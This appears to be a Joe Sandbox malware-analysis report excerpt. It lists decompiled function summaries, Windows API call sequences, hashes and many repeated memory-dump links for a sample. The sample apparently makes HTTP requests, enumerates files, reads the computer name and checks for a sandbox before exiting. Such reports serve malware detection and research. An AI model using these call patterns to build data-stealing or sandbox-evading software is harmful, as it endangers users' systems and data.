Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: <
API String ID: 1274457161-4251816714
Opcode ID: 53793210bfc70762f66f4af420d769a1bb7947dd86e87cbf1079ab82f930ec05
Instruction ID: c959dda399352e426a331d1c92fd76b991eac4d49a4a23ea0a2dd430476dc633
Opcode Fuzzy Hash: 53793210bfc70762f66f4af420d769a1bb7947dd86e87cbf1079ab82f930ec05
Instruction Fuzzy Hash: 1F216FB1E01209ABDF14EFA4E845BDE7B75FB05320F10862AF915A72C1EB706A05CF81

Function 006A51F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Part of subcall function 00696280: InternetOpenA.WININET(006B0DFE,00000001,00000000,00000000,00000000), ref: 006962E1
Part of subcall function 00696280: StrCmpCA.SHLWAPI(?,0135E928), ref: 00696303
Part of subcall function 00696280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00696335
Part of subcall function 00696280: HttpOpenRequestA.WININET(00000000,GET,?,0135E1D0,00000000,00000000,00400100,00000000), ref: 00696385
Part of subcall function 00696280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006963BF
Part of subcall function 00696280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006963D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006A5228

Strings

ERROR, xrefs: 006A5273
ERROR, xrefs: 006A521A

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 78afa1a1799b866f443be151d0a0f2eb9daf608e51dd2b115f1a8f196ec6e25d
Instruction ID: 8a6a0cc220ce26a1bba29950caf4330d8072dce9de8b4fbaca82e409695d226c
Opcode Fuzzy Hash: 78afa1a1799b866f443be151d0a0f2eb9daf608e51dd2b115f1a8f196ec6e25d
Instruction Fuzzy Hash: D5112E70900108ABCB94FFA4DD52AED737AAF52340F90415DF90B5A592EF34AF06CE95

Function 006A4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B

lstrcat.KERNEL32(?,00000000), ref: 006A4F7A
lstrcat.KERNEL32(?,006B1070), ref: 006A4F97
lstrcat.KERNEL32(?,01359048), ref: 006A4FAB
lstrcat.KERNEL32(?,006B1074), ref: 006A4FBD

Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943

Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: c7d57d4b159956d87f3ba6318e57d6ae8625ecbef47952a628765cb5adab530b
Instruction ID: ec403992bb3081ecc47b7592101c25b84e5a4b7b685681d10bd8dfd88f23388f
Opcode Fuzzy Hash: c7d57d4b159956d87f3ba6318e57d6ae8625ecbef47952a628765cb5adab530b
Instruction Fuzzy Hash: 7D21D0B69002046BC794F7B0DC46EEE337DB755300F40465DB64557181DE749AC8CF96

Function 006A0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,013590A8), ref: 006A079A
StrCmpCA.SHLWAPI(00000000,01358FC8), ref: 006A0866
StrCmpCA.SHLWAPI(00000000,01358FE8), ref: 006A099D

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 39480bda8a2dabdebda5b29b33fde301c31952d0ac8f5ad4a4b2098cd7a2fe8d
Instruction ID: 1380b86a52ef4e582a4c4bcce283d6cd3de3caf0a29d0c02076c40630457930a
Opcode Fuzzy Hash: 39480bda8a2dabdebda5b29b33fde301c31952d0ac8f5ad4a4b2098cd7a2fe8d
Instruction Fuzzy Hash: 95914575A101089FCB58FF64D991AEE77BABF95300F50851DE80A9F241DB30DE05CB96

Function 006A0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,013590A8), ref: 006A079A
StrCmpCA.SHLWAPI(00000000,01358FC8), ref: 006A0866
StrCmpCA.SHLWAPI(00000000,01358FE8), ref: 006A099D

Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 877b95b2fa366ff9b7241c1a4659ebadfc9d72ae2e3466ef25a33f71b1cee599
Instruction ID: 3c6fa0e18502b83d751663e7cdafcbace772e7630cb8aa7d5030efe3da74818d
Opcode Fuzzy Hash: 877b95b2fa366ff9b7241c1a4659ebadfc9d72ae2e3466ef25a33f71b1cee599
Instruction Fuzzy Hash: E7814475A102049FCB58EF64D991AEEB7B7BF95300F50851DE8099B241DB309E05CF86

Function 00B5E250 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 113memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00B5EB2B
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00B5EBBF

Strings

V, xrefs: 00B5EB9C

Memory Dump Source

Source File: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID: V
API String ID: 2087232378-1342839628
Opcode ID: ce528b3fee1b335c0b79ad82f4abfd3cfe064371fb48cb611fffe24765d5939b
Instruction ID: 3cf6c9f86ec61c69e60a5f6d6ad88494a2c0928514a2271cddaa9d1d4d24103d
Opcode Fuzzy Hash: ce528b3fee1b335c0b79ad82f4abfd3cfe064371fb48cb611fffe24765d5939b
Instruction Fuzzy Hash: 31417DB1204209DFEB249F28CC88BEF77E4EB08316F1404A5AD15C7B81E676DD58CB19

Function 006A78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 006A7910
RtlAllocateHeap.NTDLL(00000000), ref: 006A7917
GetComputerNameA.KERNEL32(?,00000104), ref: 006A792F

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
Instruction ID: 8007cfe01c93950f1203c5efa1ddae98d6dbb91b2b70e65d3cc28569b862a39e
Opcode Fuzzy Hash: f704199ad64deb1fa1811bab2605ace5f856bfbab6fc58d9ab2895bd6cb7f30f
Instruction Fuzzy Hash: 6C0186B1904204EFC714EF94DD45BABFBB8F705B11F10422AF945E3280C37559008BA1

Function 006A9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 006A9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 006A94A5
CloseHandle.KERNEL32(00000000), ref: 006A94AF

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: 8734e165dd4c2a5b05d40f1807b35e78b9eb4b7c7deb9f8e19ae3ff58cb62416
Instruction ID: d70fc6d671d5f1b689ec5d3a887d32b0934a090dd1444be73c8eed70df4b2ebe
Opcode Fuzzy Hash: 8734e165dd4c2a5b05d40f1807b35e78b9eb4b7c7deb9f8e19ae3ff58cb62416
Instruction Fuzzy Hash: FBF0547490020CFBDB08EF94DC4AFED77B8FB08300F104559BA1957290D6B05E85DB91

Function 00691110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0069112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00691132
ExitProcess.KERNEL32 ref: 00691143

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
